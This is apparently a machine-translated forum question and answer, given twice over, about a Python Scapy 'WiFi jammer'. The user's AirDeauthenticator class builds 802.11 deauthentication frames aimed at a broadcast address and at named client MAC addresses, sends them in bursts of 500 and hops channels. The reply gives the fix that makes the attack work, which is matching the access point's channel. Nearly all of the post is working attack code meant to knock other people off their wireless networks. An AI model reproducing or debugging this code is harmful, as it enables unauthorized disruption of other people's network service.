带 Scapy 的 Wifi 干扰器不工作
Wifi Jammer with Scapy not working
所以我一直在尝试使用 Scapy 让这个 Wifi 干扰器工作。
我已经按照这个非常简单的教程进行操作,应该足够了:
https://www.youtube.com/watch?v=NKqG_i6qMJM
虽然我得到了相同的输出,但这没有用。
然后我找到了这个项目:
https://github.com/DanMcInerney/wifijammer/blob/master/wifijammer.py
它自己进行一些自动扫描和频道跳转以填充一些变量。如果我 运行 它,效果很好。
所以我想出了自己的代码,我认为它可以正常工作,但不知何故好像什么也没发生,尽管所有输出似乎都很好。
这是我的 AirJammer class(无法在此处正确缩进代码,但在我的实际项目中是正确的):
class AirDeauthenticator(object):
def __init__(self):
self.deauth_running = False
self.running_interface = None
self.deauth_thread = None
self.channel_hopper_thread = None
self.channel_lock = Lock()
self.current_channel = 3
self.targeted_only = False # Flag if we only want to perform targeted deauthentication attacks
self._burst_count = 500 # Number of sequential deuathentication packet bursts to send
self._bssids_to_deauth = [] # MAC addresses of APs, used to send deauthentication packets to broadcast
self._clients_to_deauth = {} # Pairs clients to their connected AP to send targeted deauthentication attacks
def add_bssid(self, bssid):
self._bssids_to_deauth.append(bssid)
def add_client(self, client, bssid):
self._clients_to_deauth[client] = bssid
def set_burst_count(self, count):
self._burst_count = count
def hop_channels(self, interface, hop_interval):
while self.deauth_running:
print self.current_channel
Popen(['iw', 'dev', interface, 'set', 'channel', str(self.current_channel)], stdout=DEVNULL, stderr=PIPE)
with self.channel_lock:
self.current_channel += 1
if self.current_channel > 11:
self.current_channel = 1
sleep(hop_interval)
def deauthentication_attack(self, interface):
# Based on:
# https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
packets = []
if not self.targeted_only:
for bssid in self._bssids_to_deauth:
deauth_packet = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) / Dot11Deauth()
packets.append(deauth_packet)
for client in self._clients_to_deauth.keys():
bssid = self._clients_to_deauth[client]
deauth_packet1 = Dot11(addr1=bssid, addr2=client, addr3=client) / Dot11Deauth()
deauth_packet2 = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
packets.append(deauth_packet1)
packets.append(deauth_packet2)
count = self._burst_count if self._burst_count > 0 else 5
print "N Packets: {}\n".format(len(packets))
while count >= 0:
for packet in packets:
packet.show()
send(packet, iface = interface, count = 1, inter = 0)
count -= 1
self.deauth_running = False
self.running_interface = None
def start_deauthentication_attack(self, interface, hop_interval=5):
self.running_interface = interface
self.deauth_thread = Thread(target=self.deauthentication_attack, args=(interface,))
self.channel_hopper_thread = Thread(target=self.hop_channels, args=(interface, hop_interval, ))
self.deauth_running = True
self.deauth_thread.start()
self.channel_hopper_thread.start()
这是我的测试代码:
deauthor = AirDeauthenticator()
deauthor.add_bssid('00:04:CA:AC:E9:22')
deauthor.add_client('e4:71:85:30:f5:14', '00:04:CA:AC:E9:22')
deauthor.add_client('d8:5d:4c:9a:72:60', '00:04:CA:AC:E9:22')
deauthor.start_deauthentication_attack('wlan1')
尽管我从 scapy 收到警告,但输出似乎还不错:
.WARNING: Mac 未找到到达目的地的地址。使用广播。
.WARNING: more Mac address to reach destination not found。使用广播。
但我在 wifijammer.py 工具上看到了相同的输出,并且该工具仍然有效。
尝试发送这些数据包时,我还需要注意什么吗?
我试过将界面设置为监控模式,但还是不行。
好的,就我能够调试它而言,问题确实出在该警告消息中。如果我拔下 USB-wifi 棒并将其重新插入,第一次不会出现此错误,如果我重复该过程,它仍然会出现。
我使用wifijammer.py工具时没有发生,但是我反复分析了代码,没有找到任何可以避免这种scapy问题的设置机制。
这里的问题是我 运行 打开的 wifi 频道。
为此,必须将 wifi 频道设置为与 AP 相同(客户端也将使用相同的频道)。
如果没有这个,数据包将在目标设备未侦听的另一个频率上发送。
所以我一直在尝试使用 Scapy 让这个 Wifi 干扰器工作。
我已经按照这个非常简单的教程进行操作,应该足够了: https://www.youtube.com/watch?v=NKqG_i6qMJM
虽然我得到了相同的输出,但这没有用。
然后我找到了这个项目: https://github.com/DanMcInerney/wifijammer/blob/master/wifijammer.py
它自己进行一些自动扫描和频道跳转以填充一些变量。如果我 运行 它,效果很好。
所以我想出了自己的代码,我认为它可以正常工作,但不知何故好像什么也没发生,尽管所有输出似乎都很好。
这是我的 AirJammer class(无法在此处正确缩进代码,但在我的实际项目中是正确的):
class AirDeauthenticator(object):
def __init__(self):
self.deauth_running = False
self.running_interface = None
self.deauth_thread = None
self.channel_hopper_thread = None
self.channel_lock = Lock()
self.current_channel = 3
self.targeted_only = False # Flag if we only want to perform targeted deauthentication attacks
self._burst_count = 500 # Number of sequential deuathentication packet bursts to send
self._bssids_to_deauth = [] # MAC addresses of APs, used to send deauthentication packets to broadcast
self._clients_to_deauth = {} # Pairs clients to their connected AP to send targeted deauthentication attacks
def add_bssid(self, bssid):
self._bssids_to_deauth.append(bssid)
def add_client(self, client, bssid):
self._clients_to_deauth[client] = bssid
def set_burst_count(self, count):
self._burst_count = count
def hop_channels(self, interface, hop_interval):
while self.deauth_running:
print self.current_channel
Popen(['iw', 'dev', interface, 'set', 'channel', str(self.current_channel)], stdout=DEVNULL, stderr=PIPE)
with self.channel_lock:
self.current_channel += 1
if self.current_channel > 11:
self.current_channel = 1
sleep(hop_interval)
def deauthentication_attack(self, interface):
# Based on:
# https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
packets = []
if not self.targeted_only:
for bssid in self._bssids_to_deauth:
deauth_packet = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) / Dot11Deauth()
packets.append(deauth_packet)
for client in self._clients_to_deauth.keys():
bssid = self._clients_to_deauth[client]
deauth_packet1 = Dot11(addr1=bssid, addr2=client, addr3=client) / Dot11Deauth()
deauth_packet2 = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
packets.append(deauth_packet1)
packets.append(deauth_packet2)
count = self._burst_count if self._burst_count > 0 else 5
print "N Packets: {}\n".format(len(packets))
while count >= 0:
for packet in packets:
packet.show()
send(packet, iface = interface, count = 1, inter = 0)
count -= 1
self.deauth_running = False
self.running_interface = None
def start_deauthentication_attack(self, interface, hop_interval=5):
self.running_interface = interface
self.deauth_thread = Thread(target=self.deauthentication_attack, args=(interface,))
self.channel_hopper_thread = Thread(target=self.hop_channels, args=(interface, hop_interval, ))
self.deauth_running = True
self.deauth_thread.start()
self.channel_hopper_thread.start()
这是我的测试代码:
deauthor = AirDeauthenticator()
deauthor.add_bssid('00:04:CA:AC:E9:22')
deauthor.add_client('e4:71:85:30:f5:14', '00:04:CA:AC:E9:22')
deauthor.add_client('d8:5d:4c:9a:72:60', '00:04:CA:AC:E9:22')
deauthor.start_deauthentication_attack('wlan1')
尽管我从 scapy 收到警告,但输出似乎还不错: .WARNING: Mac 未找到到达目的地的地址。使用广播。 .WARNING: more Mac address to reach destination not found。使用广播。
但我在 wifijammer.py 工具上看到了相同的输出,并且该工具仍然有效。
尝试发送这些数据包时,我还需要注意什么吗?
我试过将界面设置为监控模式,但还是不行。
好的,就我能够调试它而言,问题确实出在该警告消息中。如果我拔下 USB-wifi 棒并将其重新插入,第一次不会出现此错误,如果我重复该过程,它仍然会出现。
我使用wifijammer.py工具时没有发生,但是我反复分析了代码,没有找到任何可以避免这种scapy问题的设置机制。
这里的问题是我 运行 打开的 wifi 频道。
为此,必须将 wifi 频道设置为与 AP 相同(客户端也将使用相同的频道)。
如果没有这个,数据包将在目标设备未侦听的另一个频率上发送。